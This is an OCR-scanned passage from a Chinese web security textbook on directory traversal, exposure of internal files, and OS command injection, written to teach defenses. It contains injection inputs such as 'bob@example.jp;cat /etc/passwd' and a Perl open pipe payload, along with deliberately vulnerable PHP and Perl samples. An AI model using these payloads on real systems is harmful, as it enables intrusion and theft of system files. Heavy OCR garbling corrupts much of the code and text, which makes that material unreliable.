统 中 国定 的 文件 名 ， 但 由 于 一 般 来 说 第 三 方 无 法 得 知 存储 个 人 信息 等 文件 的 文件 名 ， 因 此 有 人 就 
会 觉得 不 会 有 遭 到 攻击 的 风险 。 

然而 ， 还 有 一 种 攻击 手段 为 ， 先 通过 目录 遍历 攻击 查看 脚本 的 源 代 码 ， 然 后 再 使 用 open 语 
句 等 来 调查 被 指定 文件 的 文件 名 。 其 中 ,在 试验 环境 的 “/4a/ 菜单 "中 点 击 "3. 4a-001: 目录 遍历 ( 脚 
本 : 显示 源码 ) 和 链接， 就 能 够 查看 脚本 源码 。 执 行 后 虽然 浏览 器 上 不 会 显示 PHP 的 源码 ， 但 通 
过 查看 HTML 的 源码 就 能 够 确认 PHP 脚本 。 































































































































































































安全 隐患 的 产生 原因 
当 应 用 满足 以 下 3 个 条 件 时 ， 就 有 可 能 产生 目录 遍历 漏洞 。 
外 界 能 够 指定 文件 名 
能 够 使 用 绝对 路 径 或 相对 路 径 等 形式 来 指定 其 他 目录 的 文件 名 
没有 校 验 是否 允 许 访问 拼接 后 的 文件 名 
如 果 从 开发 者 的 角度 来 考虑 的 话 ， 笔 者 觉得 ,漏洞 的 产生 可 能 是 因为 开发 者 没有 考虑 到 “外 
界 能 够 指定 其 他 目录 ”的 可 能 性 。 
由 于 目录 遍历 漏洞 的 产生 需要 同时 满足 以 上 3 个 条 件 ， 因 此 ， 只 要 使 其 中 任意 一 项 无 法 满足 
也 就 能 够 将 漏洞 消除 。 
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对 策 

概要 中 已 经 简单 介绍 过 消除 目录 遍历 漏洞 的 方法 ， 即 实施 以 下 任 一 项 。 
避免 由 外 界 指定 文件 名 
文件 名 中 不 允许 包含 目录 名 


限定 文件 名 中 仅 包含 字母 和 数字 
下 面 我 们 就 对 以 上 方法 进行 详细 说 明 。 





避免 由 外 界 指定 文件 名 
如 果 能 够 避免 文件 名 由 外 办 指定， 就 能 从 根本 上 解决 目录 遍历 漏洞 。 具 体 方法 有 如 下 几 种 。 
将 文件 名 固定 


将 文件 名 保存 在 会 话 变量 
不 直接 指定 文件 名 ， 而 是 使 用 编号 等 方法 间接 指定 
而 至 于 这 些 方 法 的 具体 操作 ， 此 处 就 不 再 逐一 介绍 。 


令 文件 名 中 不 允许 包含 目录 名 

如 果 文 件 名 中 不 包括 目录 名 (包括 ../)， 就 能 确保 应 用 中 只 能 访问 给 定 目录 中 的 文件 ， 从 而 
也 就 消除 了 目录 遍历 漏洞 产生 的 可 能 性 

表示 目录 的 字符 /、\、: 等 因 操 作 系 统 而 异 ， 不 同 的 操作 系统 应 当 采 用 不 同 的 程 
PHP 中 则 能 够 使 用 pasename 函数 。 

basename 六 数 会 接收 带 有 目录 的 文件 名 (也 包括 Windows 的 盘 符 )， 并 返回 末尾 的 文件 名 
部 分 。 例 如 basename('../../../../etc/hosts') 返回 的 结果 即 为 hosts。 

利用 basename 函数 的 对 策 示例 如 下 所 示 。 














oO 








字库 。 在 


Smet 











代码 清单 ”/4a/4a-001b.php 





<?php 
define('TMPLDIR', '/var/www/4a/tmpl/'); 
$tmpl = basename($ GETI['template']); 
<body> 
<?php readfile(TMPLDIR . S$tmpl . '.html'); ?> 
菜单 ( 以 下 略 ) 
</body> 
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专栏 : basename 函数 与 空 字 节 COLUMN 














PHP 的 basename 函数 在 处 理 时 不 会 删除 空 字 节 7?， 因 此 ， 即 使 使 用 了 basename 函数 也 
还 是 有 可 能 会 出 现 文件 扩展 名 被 更 改 的 情况 。 比 如 ， 假 设 以 下 脚本 中 的 扩展 名 被 指定 为 txt。 


























$file = basename ($path) . '.txt'; 





























这 时 ， 如 果 外 界 传 入 的 文件 名 为 a.php%00 ( 已 经 过 百 分 号 编码 )， 就 会 生成 如 下 文件 名 。 


4-94 ”上述 脚本 生成 的 文件 名 





ET 
| 字符 值 | 61 | 2e | 70|68|70| 00|2e 74|78|74 




















然而 ， 由 于 Windows 或 Unix 等 多 数 操作 系统 中 都 使 用 C 语言 形式 的 字符 串 ， 因 此 文件 名 
中 有 空 字 节 (\0 ) 时 就 会 被 视 为 文件 名 结束 。 这 样 一 来 ， 实 际 打开 的 文件 就 变 成 了 a.php， 应 用 
中 指定 的 txt 扩展 名 则 被 忽略 了 。 
由 此 可 见 , 文件 名 由 外 界 传 入 的 情况 下 , 有 必要 对 文件 名 进行 校 验 以 确保 其 中 不 包含 空 字 节 。 






























































令 限 定 文件 名 中 仅 包 含 字母 和 数字 

如 果 能 够 限制 文件 名 的 字符 种 类 仅 为 字母 和 数字 ， 那 么 用 于 目录 遍历 攻击 的 字符 就 会 无 法 使 
用 ， 因 此 这 个 方法 也 能 作为 目录 遍历 的 防范 策略 。 

下 面 我 们 就 来 尝试 在 4a-001.php 中 实施 这 一 方法 ， 如 下 所 示 。 


代码 清单 ”/4a/4a-001c.php 














<?php 
define('TMPLDIR', '/var/www/4a/tmpl/'); 
$stmpl = $_ GET['template']; 
if (! preg match('/\A[la-z0-9]+\z/ui', S$tmpl)) { 
die ('remplate 仅 能 指定 字母 或 数字 ' ) ; 
} 


人 














<body> 
<?php readfile(TMPLDIR .. S$tmpl . .html'); ?> 
菜单 ( 以 下 略 ) 

</body> 





























这 里 通过 preg_match 匹配 正则 表达 式 确认 了 文件 名 变量 $Stmp1l 中 仅 包 含 字 母 和 数字 。 
ereg 困 数 由 于 不 能 正确 处 理 空 字 节 ( 非 二 进 制 安全 )， 因 此 不 能 被 用 于 本 方法 。 详 情 请 参考 42 市 。 


Q 确认 于 PHP5.3.5。 
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总 结 
本 节 讲述 了 访问 文件 的 处 理 中 容易 混入 的 目录 遍历 漏洞 。 解 决 目录 遍历 漏洞 的 最 佳 方法 是 不 


台 E 


允许 外 界 指 定 文件 名 。 因 此 推荐 在 设计 阶段 就 开始 探讨 是 否 能 够 做 到 这 一 点 。 


4.10.2 ”内 部 文件 被 公开 


概要 
Web 服务 絮 的 公开 目录 中 有 时 会 放置 对 外 保密 的 文件 。 这 种 情况 下 ， 外 界 一 旦 得 知 文件 的 
URL， 就 能 够 浏览 这 些 内 部 文件 。 
内 部 文件 被 公开 会 造成 如 下 影响 。 
重要 信息 被 泄漏 
防范 内 部 文件 被 公开 的 对 策 为 ， 不 在 公开 目录 中 放置 内 部 文件 。 或 者 保险 起 见 ， 也 可 以 直接 
禁用 目录 列表 功能 。 这 一 点 在 后 面 会 进行 详 述 。 














内 部 文件 被 公开 总 览 





影响 范围 


广 司 | 仅 限于 被 公开 的 文件 


个 影响 类 型 
泄漏 重要 信息 


十 号 























CR 影响 程度 
[ 轩 中 一 大 ( 依 文件 的 重要 性 而 定 


用 户 参 与 程度 


要 



































的 对 策 概 要 
不 在 公开 二 录 中 放 内 部 文件 ， 或 者 禁用 王 | 录 列 表 功 能 。 




















攻击 手段 与 影响 
首先 使 用 以 下 URL 浏览 本 书 提供 的 虚拟 机 。 








http://example.jp/4a/data/ 
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人 心 








如 下 图 所 示 ， 页 面 上 列 出 了 目录 内 的 所 有 文件 。 
图 4-95 目录 内 的 文件 一 览 


必 异 Index of /4a/dats - Windows Internet Explorer elex™) 
GG 加 。 辐 http://example.jp/4a/data/ ” | 好 | x 

















帘 安 |@ Index of /4a/data | 从 pa 





Index of /4a/data 


Name Last modified Size Description 








和 Parent Directory 





万 | company txt 18-Dec-2010 13:21 52 





国 users.txt 18-Dec-2010 13:20 114 








Apache/2,2.14 (Ubuntu) Server af example.jp Port 80 














像 上 面 这 样 ， 使 用 URL 指定 目录 名 时 ， 页 面 上 会 罗列 出 目录 中 的 所 有 文件 
作 目 录 列 表 ( Directory Listing )。 
点 击 页 面 上 的 user.txt 链接 ， 此 时 页 面 显 示 如 下 。 
图 4-96 文件 内 容 被 显示 


厦 http://example.jp/4a/data/users.txt - Windows... lx 


OO - 加 http://example.jp/4a/data/users.txt ba | | x | 














帘 突 |@ http://examplejp/4a/data/use... | 眉 侩 
Yamada yamadaGexample.jp 03-1111-2222 
tanaka tanakaGexample.jp 03-2222-3333 
kubota kubota@example.jp 03-3333-4444 








如 文件 名 所 示 ， 页 面 上 显示 了 用 户 信息 文件 user.txt 的 内 容 。 





都 是 起 因 于 这 种 攻击 模式 。 


安全 隐患 的 产生 原因 


， 这 一 功能 就 叫 


虽然 这 种 攻击 的 手法 很 简单 ， 但 2004 年 以 前 发 生 的 Web 网 站 泄漏 用 户 个 人 信息 的 事件 多 数 


导致 内 部 文件 被 公开 的 原因 为 ， 内 部 文件 被 放 在 了 公开 目录 中 。 当 应 用 满足 以 下 条 件 时 ， 放 


置 在 公开 目录 下 的 文件 就 能 够 被 外 界 访 问 。 
文件 被 放置 在 公开 目录 中 

有 方法 得 知 访问 文件 的 URL 
没有 对 文件 设置 访问 权限 





其 中 ， 得 知 访问 文件 的 URL 的 手段 有 如 下 几 种 。 
目录 列表 功能 被 设 为 有 效 
文件 名 为 日 期 、 用 户 名 或 连续 数值 等 能 够 被 推测 的 值 
user.dat 、data.txt 等 常见 文件 名 
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通过 错误 消息 或 其 他 安全 隐患 而 得 知 文件 名 
被 外 部 网 站 链接 进而 被 搜索 引擎 收录 
Apache 中 可 以 设置 httpd.conf 或 .htaccess 来 限制 对 文件 的 访问 ， 但 仅仅 依靠 这 些 设置 来 禁止 
访问 文件 还 是 存在 风险 的 。 因 为 设置 可 能 一 不 注意 就 会 被 更 改 。 过 去 发 生 的 信息 泄漏 事件 中 ， 
然 很 多 在 一 开始 时 也 都 通过 设置 限制 了 文件 访问 ， 但 是 在 迁移 服务 器 时 限制 就 有 可 能 会 被 去 除 ， 
从 而 就 会 导致 信息 泄露 的 发 生 。 


对 策 生生 汪汪 汪汪 生生 生生 汪汪 汪汪 汪汪 汪汪 汪汪 生生 汪汪 汪汪 汪汪 汪汪 时 
防范 内 部 文件 被 公开 的 根本 性 对 策 为， 不 将 内 部 文件 放置 在 公开 目录 下 。 为 了 做 到 这 一 点 ， 
可 以 采用 以 下 方法 。 
设计 应 用 程序 时 ,决定 存放 文件 的 安全 场所 
租用 服务 器 时 确认 能 够 使 用 非 公 开 的 目录 
另外 ， 保 险 起 见 还 可 以 将 目录 列表 功能 设 为 无 效 。 其 中 ，Apache 中 可 以 如 下 编辑 httpd.conf 
文件 来 进行 设置 。 














中” 











<Directory 指定 路 径 > 
Options -Indexes 其 他 选项 
其 他 设 


</Directory> 















































如 果 租 用 服务 右 不 允许 更 改 httpd.conf， 可 以 在 公开 目录 下 放置 名 为 .htaccess 的 文件 ， 并 进 
行 如 下 设置 。 但 是 ， 鉴 于 有 些 租用 服务 需 厂 商 可 能 不 允许 使 用 .htaccess 来 更 改 设置 ， 因 此 事先 
一 定 要 对 此 加 以 确认 。 

















Options -Indexes 











参考 : Apache 中 隐藏 特定 文件 的 方法 
如 之 前 所 述 ， 为 了 防止 内 部 文件 被 公开 ， 原 则 上 应 当 彻 底 贯 彻 不 将 非 公 开 文 件 放 置 在 公开 
目录 下 的 方针 。 但 是 ， 在 既 有 Web 网 站 中 存在 此 问题 时 ， 可 能 就 无 法 通过 简单 的 移动 文件 的 方 
法 来 解决 问题 。 这 种 情况 下 ， 可 以 通过 设置 禁止 外 界 访 问 特定 文件 ,来 姑且 进行 暂时 性 的 处 理 。 
Apache 中 .htaccess 的 设置 方法 如 下 所 示 。 该 示例 中 设置 了 禁止 外 界 浏览 扩展 名 为 txt 的 文件 。 详 
情 请 参考 Apache 的 说 明文 档 。 
代码 清单 ”.htaccess 




















BITES, VtxtnSs 


deny from all 








</Files> 
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4.11 调用 OS 命令 引起 的 安全 隐患 





























Web 开发 所 使 用 的 编程 语言 中 ， 大 多 数 都 能 够 通过 Shell 执行 OS (操作 系统 ) 命令 。 通 过 
Shell 执行 OS 命令 时 ， 或 者 开发 中 用 到 的 某 个 方法 其 内 部 利用 了 Shell 时 ， 就 有 可 能 出 现 OS 命 
令 被 任意 执行 的 情况 。 这 种 现象 被 称 为 OS 命令 注入 ， 接 下 来 本 节 就 将 详解 OS 命令 注入 这 一 安 
全 隐患 。 


4.11.1 OS 命令 注入 


概要 
如 上 所 述 ，Web 应 用 开发 使 用 的 编程 语言 中 大 多 都 提供 了 通过 Shell 调用 OS 命令 的 功能 ， 
而 如 果 调 用 Shell 功能 的 方法 不 当 ， 就 可 能 导致 意料 之 外 的 OS 命令 被 执行 。 这 被 称 为 OS 命令 
注入 漏洞 。Shell 是 用 来 启动 程序 的 命令 行 界面 ， 比 如 Windows 的 cmd.exe 和 Unix 的 sh、bash 
等 。OS 命令 注入 漏洞 就 是 对 Shell 功能 的 恶意 利用 。 
一 且 Web 应 用 中 存在 OS 命令 注入 漏洞 ， 外 界 的 攻击 者 就 能 够 使 用 各 种 各 样 的 方式 来 发 动 
攻击 ， 和 危险 性 极 高 。 以 下 为 典型 的 攻击 流程 。 


1. 从 外 部 下 载 专门 用 来 攻击 的 软件 

2. 对 下 载 的 软件 授予 执行 权限 

3. 从 内 部 攻击 OS 漏洞 以 取得 管理 员 权 限 ( Local Exploit ) 
4. 攻击 者 在 Web 服务 器 上 为 所 欲 为 





























攻击 者 能 够 在 Web 服务 顺 上 进行 的 恶意 行为 有 以 下 几 种 。 


浏览 、 算 改 或 删除 Web 服务 融 内 的 文件 
对 外 发 送 邮件 
攻击 其 他 服务 器 ( 称 为 垫 脚 石 ) 


可 见 OS 命令 注入 漏洞 的 危害 极 大 ， 因 此 在 开发 过 程 中 一 定 要 避免 该 漏洞 的 产生 。 
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OS 命令 注入 漏洞 总 览 


产生 地 点 
使 用 内 部 调用 Shell 的 函数 的 地 方 


-影响 范围 
广 司 所 有 页 面 












































0 影响 类 型 
泄漏 隐私 信息 、 自 改 或 删除 数据 、 对 外 发 动 攻击 、 使 系统 停止 等 


人 影响 程度 


用 户 参与 程度 
不 需要 





对 策 概要 
Ss 和 = 
。 避免 使 用 内 部 调用 Shell 的 函数 

e。 使 用 内 部 调用 Shell 的 函数 时 ， 和 避免 由 外 界 传 入 参数 
。 将 参数 传递 给 OS 命令 之 前 使 用 安全 的 函数 进行 转 义 













































































攻击 手段 与 影响 
首先 让 我 们 来 看 一 下 针对 OS 命令 注入 漏洞 的 典型 的 攻击 模式 及 其 影响 。 


令 调 用 sendmail 命令 发 送 邮 件 
这 里 我 们 以 如 图 4-97 所 示 的 填写 反馈 信息 的 表单 为 例 来 说 明 OS 命令 注入 漏洞 。 首 先 来 看 
一 下 正常 的 运行 情况 。 


图 4-97 反馈 表单 的 页 面 跳 转 






































外 http//examplejp/4b/4b-001html - Windows Intemet Explorer lelel %]J @ http://examplejp/4b/4b-002.php - Windows Internet Explorer Elsl 3 
GO-: [8) httpy//examplejp/ab/ab-001html ~ [|x || sing pr 多 口 > | 加 htp://examplejp/ab/ab-002.php ~|[>|X||S sn pr 
窑 收 天 大 htpy/examplejp/ab/4b-00Lhtml IRO) ~ 次 “ 桓 灾 ”| 赔 htpy/examplejp/aby/4b-002php 『 IAO)™ 
请 的 跳 转 提问 已 受理 
邮箱 地 址 ， bob@examplejp 


你 好 


提问 ， 




















输入 表单 的 HTML 代码 如 下 。 


代码 清单 ”/4b/4b-001.html 





<body> 

<form action="4b-002.php" method="POST"> 
请 输入 您 的 问题 <br> 

邮箱 地 址 <input type="text" name="mail"><br> 
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提问 <textarea name="ingqu" cols="20" rows="3"> 


</textarea><br> 

<input type="submit" value=" 发 送 "> 
</form> 

</body> 





接收 页 面 的 脚本 如 下 。 通 过 在 system 函数 中 调用 sendmail 命令 ， 将 邮件 发 送 至 表单 中 所 
填 人 的 邮箱 地 址 "。 邮 件 的 信息 固定 为 template.txt 文件 的 内 容 。 


代码 清单 ”/4b/4b-002.php 





<?php 

$smail = $_ POST['mail']; 

system("/usr/sbin/sendmail -i <template.txt S$mail"); 
// 以 下 略 
?> 
<body> 
提问 已 受理 
</body> 




















下 面 为 邮件 模板 template.txt 的 示例 。 此 处 的 Subject 消息 头 已 根据 邮件 的 规则 进行 了 MIME 
编码 。 


代码 清单 ”/4b/template.txt 





From: webmaster@example.jp 
Subject: =?UTF-8?B?5Y+X44GRS5LUY44GR44G+44GX44Gf ?= 
Content-Type: text/plain; charset="UTF-8" 





Content-Transfer-Encoding: 8bit 


提问 已 受理 




















收 到 以 上 表单 发 送 的 邮件 后 ， 邮 件 客户 端的 显示 如 下 。 


中 收 件 人 通过 sendmail 命令 的 选项 来 指定 。-i 选项 表示 禁止 通过 行 首 的 点 号 结束 邮件 。 


会 图 4-98 收 到 邮件 


妇 到 咨询 


收 到 咨询 襄 
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webmaster@example.jp 
发 给 wasbook 


收 件 人 : wasbook<wasbook@examplejp> 
时 间 : 2013 年 12 月 1 日 周 日 ) 14:11 
大 小 :2 KB 


提问 已 受理 





发 件 人 : webmaster@examplejp<webmaster@examplejp> 





名 | 


2013-12-01 14:11 隐藏 信息 








令 OS 命令 注入 攻击 与 影响 


下 面 我 们 来 对 这 有 段 脚 本 实施 OS 命令 注入 攻击 。 在 表单 的 邮箱 地 址 输入 框 中 填 和 人 以 下 内 容 。 








bob@example.jp;cat /etc/passwd 











点 击发 送 按钮 后 ， 如 图 4-99 所 示 ， 页 面 上 显示 了 /etc/passwd 文件 的 内 容 。 


图 4-99 ”攻击 成 功 























攻 http//examplejp/4b/4b-001.html - Windows Internet Explorer 己 | 回 | ¥ 
OO» | 加 hapyeanplejplsbaboolhml -[3|x|[E sng P 
窒 收 夫 | 态 htp//examplejp/4b/4b-001html | | : IRo- 

请 输入 您 的 问题 


邮箱 地 址 ，xample jp:cat /etc/passwd 
一 一 一 一 时 


提问 ， 
ED 














| @ hep//examplejp/ab/ab-002.php - Windows ntemet Explorer 写 | 品 中 





GO- [@] httpy/examplejp/sb/4b-002.php ~ [|X ||S eng Pr 
窑 收 夫 | 大 htpy/examplejp/4b/4b-002.php [ IO ~ 

















跳 转 


显示 了 /etc/passwd 的 内 容 


中 ‘sbin/halt 














mails8-12mait/var/spoolimail /sbin/nologin 








虽然 在 上 面 的 攻击 示例 中 ,攻击 者 只 是 查看 了 文件 内 容 ,， 但 实际 上 ,通过 OS 命令 注入 攻 
击 ， 攻 击 者 能 够 执行 Web 应 用 的 用 户 权限 所 能 够 执行 的 所 有 命令 。 比 如 删除 或 更 改 文件 、 下 载 
外 部 文件 、 使 用 下 载 的 恶意 软件 等 。 


针对 OS 命令 注入 漏洞 的 典型 


的 攻击 方法 为 ， 下 载 攻击 OS 漏洞 的 恶意 代码 ， 并 通过 内 部 攻 





击 取得 管理 员 权 限 。 这 样 ， 攻 击 者 就 能 够 完全 支配 Web 服务 器 。 


今 通过 添加 命令 选项 进行 攻击 





根据 应 用 中 调用 的 OS 命令 ， 有 时 也 能 通过 添加 命令 选项 的 方法 来 发 动 攻击 。 比 如 Unix 的 
find 命令 。find 命令 是 通过 指定 条 件 来 查找 文件 的 命令 , 但 是 ， 在 指定 了 -exec 选项 后 ，find 就 
能 够 针对 查找 结果 的 文件 名 执行 命令 。 由 此 可 见 ， 仅 通过 添加 OS 命令 的 选项 ， 也 可 能 会 造成 意 


料 之 外 的 OS 命令 被 执行 。 
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安全 隐患 的 产生 原因 
内 部 调用 OS 命令 的 函数 以 及 系统 调用 ( System Call ) 中 ， 多 数 都 通过 Shell 来 启动 命令 。 
Shell 是 用 来 操作 OS 的 命令 行 界面 ， 如 Windows 中 的 cmd.exe、Unix 系 的 OS 中 的 sh、bash、 
csh 等 。 通 过 Shell 来 启动 命令 ,能够 使 管道 命令 ( Pipe ) 或 重 定 向 等 功能 的 使 用 变 得 更 加 便捷 。 
会 图 4-100 通过 Shell 调用 OS 命令 


system('echo hello > atxt)，| PHP 中 调用 system 函数 


L 


- 守 际 户 动 的 个 全 
sh —c echo hello > a.txt 实际 电动 的 命令 。 
通过 sh 调用 op 


然而 ，Shell 提供 的 便利 功能 却 会 成 为 OS 命令 注入 漏洞 产生 的 根源 。Shell 提供 了 一 次 启动 
多 个 命令 的 语法 ， 因 此 外 界 就 可 以 在 参数 中 做 手脚 ， 使 得 在 原来 的 命令 的 基础 上 又 有 其 他 的 命令 
被 启动 。 这 就 是 OS 命令 注入 。 

还 有 一 种 情况 是 ， 虽 然 开发 者 并 没有 想 要 调用 OS 命令 ， 但 却 在 无 意 中 使 用 了 内 部 会 启动 
Shell 的 函数 。 典 型 的 例子 为 Perl 的 open 函数 ， 详 情 会 在 本 节 的 最 后 讲述 。 

综 上 所 述 ,产生 OS 注入 漏洞 的 情况 有 如 下 两 类 。 


全 通过 Shell 调用 OS 命令 时 ， 没 有 转 义 Shell 的 元 字符 
> 使 用 了 内 部 调用 Shell 的 函数 


下 面 就 让 我 们 来 依次 看 一 下 这 两 种 情况 。 
令 在 Shell 中 执行 多 条 命令 


Shell 提供 了 通过 指定 1 行 来 启动 多 个 程序 的 方法 。 而 OS 命令 注入 攻击 就 是 恶意 利用 了 
Shell 能 够 启动 多 个 程序 的 特性 。 比 如 ， 在 Unix 的 Shell 中 ,能够 使 用 以 下 写法 。 


会 执行 例 在 Shell 中 执行 多 条 命令 


















































Se aaa , scho bbb 
1 


s$ echo aaa 四 echo bpbb # 在 后 台 和 前 台 执 行 


[1] + Done were 


$ echo aaa 
aaa 


s cat aaa | | scnao bpbb # 如 果 第 1 个 命令 执行 失败 就 执行 第 2 个 命令 
: aaa: NO such file or directory 
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$ we # 将 倒 引 号 (、) 中 的 字符 串 作为 命令 执行 
13 34 350 oscom001.php 
40 Sy be re elol a oe; 


53 L133 T1889 total 
$ echo aaa | wec # 将 第 1 个 命令 的 输出 作为 第 2 个 命令 的 输入 
扒 





Windows 的 cmd.exe 中 能 够 使 用 & 来 连续 执行 多 条 命令 ( 同 Unix 的 ; )。 另 外 | (管道 功能 )、 
&& 或 || 的 用 法 也 和 Unix 一 样 了。 

Shell 中 拥有 特殊 意义 的 字符 (如 ;、| 等 ) 被 称 为 Shell 的 元 字符 。 把 元 字符 当 作 普通 字符 使 
用 时 需要 对 其 进行 转 义 。 但 由 于 Shell 的 元 字符 的 转 义 方法 很 复杂 ， 因 此 此 处 不 做 说 明 ， 详 情 可 
以 参考 Shell 的 相关 手册 。 

而 如 果 在 指定 OS 命令 参数 的 字符 串 中 混入 了 Shell 的 元 字符 ， 就 会 使 得 攻击 者 添加 的 OS 
命令 被 执行 ， 这 也 就 是 OS 命令 注入 漏洞 产生 的 原因 。 


令 使 用 了 内 部 调用 Shell 的 函数 

Perl 的 open 函数 ， 顾名思义， 是 用 于 打开 文件 的 函数 。 然 而 根据 open 的 调用 方法 的 不 同 ， 
有 些 情况 下 会 通过 Shell 执行 OS 命令 。 例 如 ， 通 过 open 函数 启动 Linux 的 pwd 命令 (显示 当 
前 目录 名 的 命令 ) 时 ， 只 要 像 下 面 的 CGI 脚本 一 样 ， 调 用 open 函数 时 在 命令 名 后 面 加 上 管道 符 
号 | 即 可 。 


记 代码 清单 ”/4b/4b-003.cgi 各 





#!/usr/bin/perl 

print "Content-Type: text/plain\n\n<body>"; 
open FL, '/bin/pwd|' or die $1!; 

print <FL>; 

close FL; 








print "</body>"; 





执行 该 脚本 后 ， 当 前 目录 名 就 会 通过 pwd 命令 显示 出 来 。 

在 使 用 了 Perl 的 open 函数 的 脚本 中 ， 如 果 外 界 能 够 指定 文件 名 ， 就 能 通过 在 文件 名 的 前 后 
加 上 管道 符号 | 来 实施 OS 命令 注入 攻击 。 

接 下 来 我 们 就 来 演示 如 何 发 动 攻击 。 以 下 为 一 段 CGI 脚本 ， 其 作用 仅 限 于 打开 文件 并 将 其 
显示 。 


合 代码 清单 ”/4b/4b-004.cgi 各 





#!/usr/bin/perl 
use strict; 


中 详情 请 参考 以 下 链接 : http://technet.microsoft.com/zh-cn/library/cc737438(v=ws.10).aspx。 
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use utf8; 
use open ':utf8'; # 将 默认 字符 编码 设 为 UTF-8 
use CGI; 


print "Content-Type: text/plain; charset=UTF-8\r\n\r\n"; 


my $9q = new CGI; 
my $file = $q->param('file'); 
open (IN, $file) or die $!; # 打开 文件 








print <IN>; # 显示 文件 的 全 部 内 容 
close IN; # 关闭 文件 








如 果 将 查询 字符 串 中 的 file 指定 如 下 ，/sbin 目录 下 的 文件 一 览 就 会 被 显示 在 页 面 上 "。 








file=ls+/sbin | 














执行 结果 如 下 图 所 示 。 
图 4-101 显示 了 /sbin 目录 的 文件 一 览 


入 http://examplejp/4b/4b-004.cgizfilels+/sbin| - Windo... [ilies | 
GO© Y 加 http://example.jp/4b/4b-004.cgi?file=ls+/sbin| -| x 














福安 |@ http://examplejp/4b/4b-004.cgi?file=ls.. | | my 








MAKEDEV [于 
badblocks 

blkid 

blockdev 

bootlogd 

cfdisk 

ctrlaltdel 

debugfs 一 

















令 安 全 隐患 的 产生 原因 总 结 
Web 应 用 的 开发 语言 中 ， 有 些 函 数 的 内 部 实现 利用 了 Shell。 如 果 开 发 者 使 用 了 这 些 内 部 调 
用 Shell 的 函数 ， 就 可 能 会 使 得 意料 之 外 的 OS 命令 被 执行 。 这 种 状态 被 称 为 OS 命令 注入 漏洞 。 
OS 命令 注入 漏洞 的 形成 需要 同时 满足 以 下 三 项 条 件 。 
使 用 了 内 部 调用 Shell 的 函数 (system、open 等 ) 
将 外 界 传人 的 参数 传递 给 内 部 调用 Shell 的 函数 
参数 中 Shell 的 元 字符 没有 被 转 义 








对 策 和 
为 了 防范 OS 命令 注 和 漏洞， 推荐 大 家 使 用 下 列 方法 中 的 任意 一 项 ， 这 里 我 们 将 以 下 四 种 方 
法 按照 推荐 度 由 高 到 低 进 行 了 排序 。 


选择 不 调用 OS 命令 的 实现 方法 


中 ”该 脚本 同时 也 存在 目录 遍历 漏洞 。 详 情 请 参考 4.10 节 。 
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避免 使 用 内 部 调用 Shell 的 函数 
不 将 外 界 输入 的 字符 串 传 递 给 命令 行 参数 
使 用 安全 的 函数 对 传递 给 OS 命令 的 参数 进行 转 义 


多 在 设计 阶段 决定 对 策 方针 
具体 选择 哪 一 项 对 策 方 法 ， 应 当 在 设计 阶段 就 确定 下 来 。 为 此 ， 建 议 在 各 个 设计 阶段 分 别 探 
讨 以 下 内 容 。 

基本 设计 阶段 
围绕 代码 实现 方式 的 设计 进行 以 下 讨论 。 
e@ 决定 主要 功能 的 代码 实现 方针 
e 尽量 利用 专门 的 程序 库 , 迫不得已 时 再 使 用 OS 命令 来 实 







































































过 














详细 设计 阶段 
e 设计 各 功能 的 详细 的 实现 方式 时 ,极力 避免 使 用 内 部 调用 Shell 的 函数 
e 只 能 使 用 内 部 调用 Shell 的 函数 时 ,讨论 决定 是 将 参数 固定 ,还 是 由 标准 输入 来 指定 参数 































































































下 面 我 们 就 来 分 别 看 一 下 各 个 方法 的 详情 。 


多 选择 不 调用 OS 命令 的 实现 方法 
推荐 度 最 高 的 方法 为 不 调用 OS 命令 ， 即 不 利用 调用 Shell 的 功能 。 这 样 一 来 ， 既 杜绝 了 
OS 命令 注入 漏洞 混 人 的 可 能 性 ， 又 消除 了 调用 OS 命令 的 系统 开销 ， 能 够 从 多 方面 提高 应 用 
的 性 能 。 
下 面 是 利用 PHP 程序 库 重 写 之 前 的 发 送 邮 件 脚本 ( /4b/4b-002.php ) 的 例子 。PHP 中 发 送 邮 
件 时 可 以 利用 mb_send mail 函数 。 











代码 清单 ”/4b/4b-002a.php 





<?php 
$mail = $ POST['mail']; 
mb language ('Japanese'); 
mb_send mail ($mail, "已 受理 "， 
" 提问 已 受理 "， 


"From: webmaster@example.jp"); 




















2 
<body> 
提问 已 受理 
</body> 




















然而 ， 发 送 邮 件 的 功能 中 可 能 会 引入 邮件 头 注入 漏洞 ， 详 情 请 参考 4.9 节 。 后 面 的 一 个 示例 
脚本 也 有 同样 问题 。 





多 避免 使 用 内 部 调用 Shell 的 函数 
在 不 调用 OS 命令 就 无 法 实现 所 需 功 能 的 情况 下 ， 调 用 OS 命令 时 最 好 使 用 不 经 过 Shell 的 
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函数 。 由 于 PHP 中 没有 合适 的 函数 ,因此 这 里 以 Perl 为 例 进 行 讲解 。 而 如 果 只 是 想 了 解 PHP 中 
的 对 策 方 法 ， 则 可 以 跳 过 本 小 节 而 直接 阅读 下 一 人 小节。 

Perl 中 也 存在 名 为 system 的 函数 来 启动 OS 命令 。Perl 的 system 函数 有 两 种 指定 命令 和 
参数 的 方法 ， 即 既 可 以 在 一 个 参数 中 将 它们 用 空格 相隔 ， 也 可 以 将 它们 分 别 指定 为 函数 的 不 同 参 
数 。 下 面 为 Perl 脚本 中 启动 grep 命令 的 示例 。 

首先 是 经 过 Shell 的 调用 方法 。 此 调用 方法 存在 OS 命令 注入 漏洞 。 














my S$rtn = system("/bin/grep S$keyword /var/data/*.txt"); 














接 下 来 是 不 经 过 Shell 的 调用 方法 。 











my S$rtn = system('/bin/grep', '--', $keyword, glob('/var/data/*.txt')); 








像 上 面 这 样 分 别 指定 命令 名 和 参数 时 ， 由 于 不 经 过 Shell， 因 此 Shell 的 元 字符 ( ;、| 、` 等 ) 
就 会 作为 命令 的 参数 被 直接 传递 。 也 就 是 说 ， 理 论 上 不 会 产生 OS 命令 注入 漏洞 。 

system 函数 的 第 2 个 参数 中 指定 的 --'， 表 示 选 项 ( Option ) 的 指定 已 经 结束 ， 后 面 指定 的 
都 是 选项 以 外 的 参数 (Parameter )。 如 果 不 这 样 做 ， 外 界 就 可 以 通过 -R 等 第 一 个 字符 为 - 的 关键 
字 来 任意 指定 选项 。 

另外 ，systenm 函数 的 第 4 个 参数 中 用 到 了 glob 函数 ， 它 能 通过 展开 通配符 (*.txt ) 来 取 
得 所 有 匹配 的 文件 名 (与 PHP 的 glob 函数 相同 )。 经 过 Shell 调用 命令 时 ，Shell 会 展开 通配符 ， 
而 不 经 过 Shell 时 就 需要 像 本 例 一 样 自 己 手动 展开 通配符 。 

